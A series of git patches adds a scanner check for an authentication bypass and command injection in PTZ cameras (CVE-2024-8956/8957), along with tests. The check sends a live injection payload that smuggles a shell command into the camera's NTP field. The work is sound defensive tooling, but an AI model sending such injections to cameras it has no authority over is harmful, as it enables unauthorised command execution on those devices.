From c3ca54be087a932e2a560018f3b4e18465e5909d Mon Sep 17 00:00:00 2001 From: nmasdoufi-ol Date: Tue, 5 Nov 2024 10:34:30 +0100 Subject: [PATCH 1/6] Add detection for CVE-2024-8956 and CVE-2024-8957 --- agent/definitions.py | 2 +- agent/exploits/vhd_ptz_exploit.py | 118 +++++++++++++++++++++++++ agent/exploits/webexploit.py | 3 +- tests/exploits/vhd_ptz_exploit_test.py | 102 +++++++++++++++++++++ 4 files changed, 223 insertions(+), 2 deletions(-) create mode 100644 agent/exploits/vhd_ptz_exploit.py create mode 100644 tests/exploits/vhd_ptz_exploit_test.py diff --git a/agent/definitions.py b/agent/definitions.py index 3bffa03..c989231 100644 --- a/agent/definitions.py +++ b/agent/definitions.py @@ -53,7 +53,7 @@ class VulnerabilityMetadata: title: str description: str - reference: str + reference: str | list[str] risk_rating: str = "CRITICAL" diff --git a/agent/exploits/vhd_ptz_exploit.py b/agent/exploits/vhd_ptz_exploit.py new file mode 100644 index 0000000..dfeb509 --- /dev/null +++ b/agent/exploits/vhd_ptz_exploit.py @@ -0,0 +1,118 @@ +"""Agent Asteroid implementation for CVE-2024-8956 and CVE-2024-8957""" + +import datetime +import logging +import re + +from packaging import version +from requests import exceptions as requests_exceptions + +from agent import definitions +from agent import exploits_registry +from agent.exploits import webexploit + +VULNERABILITY_TITLE = "ValueHD PTZ Camera Authentication Bypass and Command Injection" +VULNERABILITY_REFERENCE = ["CVE-2024-8956", "CVE-2024-8957"] +VULNERABILITY_DESCRIPTION = ( + "ValueHD PTZ cameras below firmware version 6.3.40 contain an authentication bypass " + "vulnerability in the param.cgi endpoint and a command injection vulnerability via " + "NTP server configuration." +) +RISK_RATING = "CRITICAL" +DEFAULT_TIMEOUT = datetime.timedelta(seconds=90) + + +@exploits_registry.register +class VHDPTZExploit(webexploit.WebExploit): + accept_request = definitions.Request( + method="GET", path="/cgi-bin/param.cgi?get_device_conf" + ) + check_request = definitions.Request( + method="GET", path="/cgi-bin/param.cgi?get_device_conf" + ) + inject_request = definitions.Request( + method="POST", + path="/cgi-bin/param.cgi?post_network_other_conf", + data=b"ntp_addr=$(ping${IFS}-c4${IFS}8.8.8.8)", + ) + + accept_pattern = [ + re.compile(r'versioninfo="SOC v\d+\.\d+\.\d+\s*[-\\s*ARM]?'), + ] + + version_pattern = re.compile(r'versioninfo="SOC v(\d+\.\d+\.\d+)') + + vuln_ranges = [ + definitions.VulnRange( + min=None, # No minimum version + max=version.Version("6.3.39"), # Versions up to 6.3.39 are vulnerable + ) + ] + + metadata = definitions.VulnerabilityMetadata( + title=VULNERABILITY_TITLE, + description=VULNERABILITY_DESCRIPTION, + reference=VULNERABILITY_REFERENCE, + risk_rating=RISK_RATING, + ) + + def check(self, target: definitions.Target) -> list[definitions.Vulnerability]: + """Rule to detect specific vulnerabilities on a target.""" + + vulnerabilities: list[definitions.Vulnerability] = [] + vulnerabilities.extend(self._detect_auth_bypass(target)) + vulnerabilities.extend(self._detect_command_injection(target)) + + return vulnerabilities + + def _detect_auth_bypass( + self, target: definitions.Target + ) -> list[definitions.Vulnerability]: + """Detect the authentication bypass vulnerability.""" + vulnerabilities: list[definitions.Vulnerability] = [] + + target_endpoint = self.accept_request.path + try: + resp = self.session.get( + f"{target.origin}{target_endpoint}", timeout=DEFAULT_TIMEOUT.seconds + ) + if self._is_vulnerable_version(resp.text) is True: + vulnerabilities.append(self._create_vulnerability(target)) + except requests_exceptions.RequestException as e: + logging.error("Auth bypass detection failed: %s", e) + + return vulnerabilities + + def _detect_command_injection( + self, target: definitions.Target + ) -> list[definitions.Vulnerability]: + """Detect the command injection vulnerability.""" + vulnerabilities: list[definitions.Vulnerability] = [] + + target_endpoint = self.inject_request.path + try: + resp = self.session.post( + f"{target.origin}{target_endpoint}", + data=self.inject_request.data, + timeout=DEFAULT_TIMEOUT.seconds, + ) + if resp.status_code == 200 and "Success" in resp.text: + vulnerabilities.append(self._create_vulnerability(target)) + except requests_exceptions.RequestException as e: + logging.error("Command injection detection failed: %s", e) + + return vulnerabilities + + def _is_vulnerable_version(self, response_text: str) -> bool: + """Check if the target is running a vulnerable version.""" + if (matched := self.version_pattern.findall(response_text)) is not None: + for extracted_version in matched: + logging.info("Extracted version: %s", extracted_version) + for r in self.vuln_ranges: + if ( + r.min is None or r.min <= version.Version(extracted_version) + ) and ( + r.max is None or r.max >= version.Version(extracted_version) + ): + return True + return False diff --git a/agent/exploits/webexploit.py b/agent/exploits/webexploit.py index 6646c3e..7618d18 100644 --- a/agent/exploits/webexploit.py +++ b/agent/exploits/webexploit.py @@ -120,7 +120,8 @@ def _create_vulnerability( short_description=self.metadata.description, description=self.metadata.description, references={ - "nvd.nist.gov": f"https://nvd.nist.gov/vuln/detail/{self.metadata.reference}", + f"nvd.nist.gov/{cve}": f"https://nvd.nist.gov/vuln/detail/{cve}" + for cve in self.metadata.reference }, recommendation=( "- Make sure to install the latest security patches from software vendor \n" diff --git a/tests/exploits/vhd_ptz_exploit_test.py b/tests/exploits/vhd_ptz_exploit_test.py new file mode 100644 index 0000000..4be81ac --- /dev/null +++ b/tests/exploits/vhd_ptz_exploit_test.py @@ -0,0 +1,102 @@ +"""Unit tests for Agent Asteroid: VHD PTZ Camera Vulnerabilities""" + +import requests_mock as req_mock + +from agent import definitions +from agent.exploits import vhd_ptz_exploit + + +def testVHDPTZ_whenVulnerable_reportFinding( + requests_mock: req_mock.mocker.Mocker, +) -> None: + """Test case: when target is vulnerable (firmware 6.3.32).""" + requests_mock.get( + "http://localhost:80/cgi-bin/param.cgi?get_device_conf", + text='devname="ptzoptics" devtype="VX630A" versioninfo="SOC v6.3.32 - ARM 6.3.51THI" serial_num="r1j04260027" device_model="F53.HI"', + status_code=200, + ) + requests_mock.post( + "http://localhost:80/cgi-bin/param.cgi?post_network_other_conf", + text='{"Response":{"Result":"Success"}}"', + status_code=200, + ) + + exploit_instance = vhd_ptz_exploit.VHDPTZExploit() + target = definitions.Target("http", "localhost", 80) + + accept = exploit_instance.accept(target) + vulnerabilities = exploit_instance.check(target) + + assert accept is True + assert len(vulnerabilities) > 0 + vulnerability = vulnerabilities[0] + assert ( + vulnerability.entry.title + == "ValueHD PTZ Camera Authentication Bypass and Command Injection" + ) + + +def testVHDPTZ_whenSafe_reportNothing( + requests_mock: req_mock.mocker.Mocker, +) -> None: + """Test case: when target is safe (firmware 6.3.40).""" + requests_mock.get( + "http://localhost:80/cgi-bin/param.cgi?get_device_conf", + text='devname="ptzoptics" devtype="VX630A" versioninfo="SOC v6.3.40 - ARM 6.3.51THI" serial_num="r1j04260027" device_model="F53.HI"', + status_code=200, + ) + requests_mock.post( + "http://localhost:80/cgi-bin/param.cgi?post_network_other_conf", + text="Couldn't connect to server\"", + status_code=200, + ) + + exploit_instance = vhd_ptz_exploit.VHDPTZExploit() + target = definitions.Target("http", "localhost", 80) + + accept = exploit_instance.accept(target) + vulnerabilities = exploit_instance.check(target) + + assert accept is True + assert len(vulnerabilities) == 0 + + +def testVHDPTZ_whenAuthRequired_reportNothing( + requests_mock: req_mock.mocker.Mocker, +) -> None: + """Test case: when authentication is required (not vulnerable).""" + requests_mock.get( + "http://localhost:80/cgi-bin/param.cgi?get_device_conf", + status_code=401, + ) + exploit_instance = vhd_ptz_exploit.VHDPTZExploit() + target = definitions.Target("http", "localhost", 80) + + accept = exploit_instance.accept(target) + + assert accept is False + + +def testVHDPTZ_whenOlderVersion_reportFinding( + requests_mock: req_mock.mocker.Mocker, +) -> None: + """Test case: when target has much older version (2.0.39).""" + requests_mock.get( + "http://localhost:80/cgi-bin/param.cgi?get_device_conf", + text='devname="ptzoptics" devtype="VX630A" versioninfo="SOC v2.0.39 - ARM 6.0.30SHIS" serial_num="r1j04260027" device_model="F53.HI"', + status_code=200, + ) + requests_mock.post( + "http://localhost:80/cgi-bin/param.cgi?post_network_other_conf", + text='{"Response":{"Result":"Success"}}"', + status_code=200, + ) + + exploit_instance = vhd_ptz_exploit.VHDPTZExploit() + target = definitions.Target("http", "localhost", 80) + + accept = exploit_instance.accept(target) + vulnerabilities = exploit_instance.check(target) + + assert accept is True + assert len(vulnerabilities) > 0 From 417b56961a8833e5c4586d34d808d8181ab2fbde Mon Sep 17 00:00:00 2001 From: nmasdoufi-ol Date: Tue, 5 Nov 2024 14:12:33 +0100 Subject: [PATCH 2/6] Resolving comments. --- agent/exploits/webexploit.py | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/agent/exploits/webexploit.py b/agent/exploits/webexploit.py index 7618d18..abb2f20 100644 --- a/agent/exploits/webexploit.py +++ b/agent/exploits/webexploit.py @@ -114,15 +114,22 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]: def _create_vulnerability( self, target: definitions.Target ) -> definitions.Vulnerability: + if isinstance(self.metadata.reference, list): + references = { + f"nvd.nist.gov/{cve}": f"https://nvd.nist.gov/vuln/detail/{cve}" + for cve in self.metadata.reference + } + else: + references = { + f"nvd.nist.gov/{self.metadata.reference}": f"https://nvd.nist.gov/vuln/detail/{self.metadata.reference}" + } + entry = kb.Entry( title=self.metadata.title, risk_rating=self.metadata.risk_rating, short_description=self.metadata.description, description=self.metadata.description, - references={ - f"nvd.nist.gov/{cve}": f"https://nvd.nist.gov/vuln/detail/{cve}" - for cve in self.metadata.reference - }, + references=references, recommendation=( "- Make sure to install the latest security patches from software vendor \n" "- Update to the latest software version" From aaf986b0e806a139201cb40c0a0c263605cc43a0 Mon Sep 17 00:00:00 2001 From: nmasdoufi-ol Date: Tue, 5 Nov 2024 15:03:12 +0100 Subject: [PATCH 3/6] codecov yadawla. --- agent/asteroid_agent.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/agent/asteroid_agent.py b/agent/asteroid_agent.py index 6da757b..a634d9d 100644 --- a/agent/asteroid_agent.py +++ b/agent/asteroid_agent.py @@ -69,6 +69,8 @@ def process(self, message: m.Message) -> None: executor.submit(_check_target, exploit, target) for target in targets for exploit in self.exploits + # if type(exploit).__name__ + # == "VHDPTZExploit" # Filter for the specific exploit name ] for target_vulnz in futures.as_completed(targets_checks): if len(target_vulnz.result()) == 0: From 8efef42d73e722c2149818f0fee95e25a2fd09ee Mon Sep 17 00:00:00 2001 From: nmasdoufi-ol Date: Tue, 5 Nov 2024 15:08:14 +0100 Subject: [PATCH 4/6] codecov. --- tests/exploits/vhd_ptz_exploit_test.py | 35 ++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) diff --git a/tests/exploits/vhd_ptz_exploit_test.py b/tests/exploits/vhd_ptz_exploit_test.py index 4be81ac..380f98e 100644 --- a/tests/exploits/vhd_ptz_exploit_test.py +++ b/tests/exploits/vhd_ptz_exploit_test.py @@ -1,6 +1,7 @@ """Unit tests for Agent Asteroid: VHD PTZ Camera Vulnerabilities""" import requests_mock as req_mock +from requests import exceptions as requests_exceptions from agent import definitions from agent.exploits import vhd_ptz_exploit @@ -100,3 +101,37 @@ def testVHDPTZ_whenOlderVersion_reportFinding( assert accept is True assert len(vulnerabilities) > 0 + + +def testVHDPTZ_authBypassRequestException_handlingErrorLogged( + requests_mock: req_mock.mocker.Mocker, +) -> None: + """Test case: handle RequestException in auth bypass detection.""" + requests_mock.get( + "http://localhost:80/cgi-bin/param.cgi?get_device_conf", + exc=requests_exceptions.RequestException("Simulated connection error"), + ) + + exploit_instance = vhd_ptz_exploit.VHDPTZExploit() + target = definitions.Target("http", "localhost", 80) + + vulnerabilities = exploit_instance._detect_auth_bypass(target) + + assert len(vulnerabilities) == 0 + + +def testVHDPTZ_commandInjectionRequestException_handlingErrorLogged( + requests_mock: req_mock.mocker.Mocker, +) -> None: + """Test case: handle RequestException in command injection detection.""" + requests_mock.post( + "http://localhost:80/cgi-bin/param.cgi?post_network_other_conf", + exc=requests_exceptions.RequestException("Simulated connection error"), + ) + + exploit_instance = vhd_ptz_exploit.VHDPTZExploit() + target = definitions.Target("http", "localhost", 80) + + vulnerabilities = exploit_instance._detect_command_injection(target) + + assert len(vulnerabilities) == 0 From d11dea2e603a9cbc1af170929d9c5c64964dee63 Mon Sep 17 00:00:00 2001 From: nmasdoufi-ol Date: Tue, 5 Nov 2024 15:08:51 +0100 Subject: [PATCH 5/6] Remove comments. --- agent/asteroid_agent.py | 2 -- 1 file changed, 2 deletions(-) diff --git a/agent/asteroid_agent.py b/agent/asteroid_agent.py index a634d9d..6da757b 100644 --- a/agent/asteroid_agent.py +++ b/agent/asteroid_agent.py @@ -69,8 +69,6 @@ def process(self, message: m.Message) -> None: executor.submit(_check_target, exploit, target) for target in targets for exploit in self.exploits - # if type(exploit).__name__ - # == "VHDPTZExploit" # Filter for the specific exploit name ] for target_vulnz in futures.as_completed(targets_checks): if len(target_vulnz.result()) == 0: From 9102d507b6366b654faf44e0aacf24583c10f379 Mon Sep 17 00:00:00 2001 From: nmasdoufi-ol Date: Tue, 5 Nov 2024 16:13:48 +0100 Subject: [PATCH 6/6] Resolve Comments. --- agent/exploits/vhd_ptz_exploit.py | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/agent/exploits/vhd_ptz_exploit.py b/agent/exploits/vhd_ptz_exploit.py index dfeb509..5f5188f 100644 --- a/agent/exploits/vhd_ptz_exploit.py +++ b/agent/exploits/vhd_ptz_exploit.py @@ -20,16 +20,13 @@ ) RISK_RATING = "CRITICAL" DEFAULT_TIMEOUT = datetime.timedelta(seconds=90) +PATH = "/cgi-bin/param.cgi?get_device_conf" @exploits_registry.register class VHDPTZExploit(webexploit.WebExploit): - accept_request = definitions.Request( - method="GET", path="/cgi-bin/param.cgi?get_device_conf" - ) - check_request = definitions.Request( - method="GET", path="/cgi-bin/param.cgi?get_device_conf" - ) + accept_request = definitions.Request(method="GET", path=PATH) + check_request = definitions.Request(method="GET", path=PATH) inject_request = definitions.Request( method="POST", path="/cgi-bin/param.cgi?post_network_other_conf",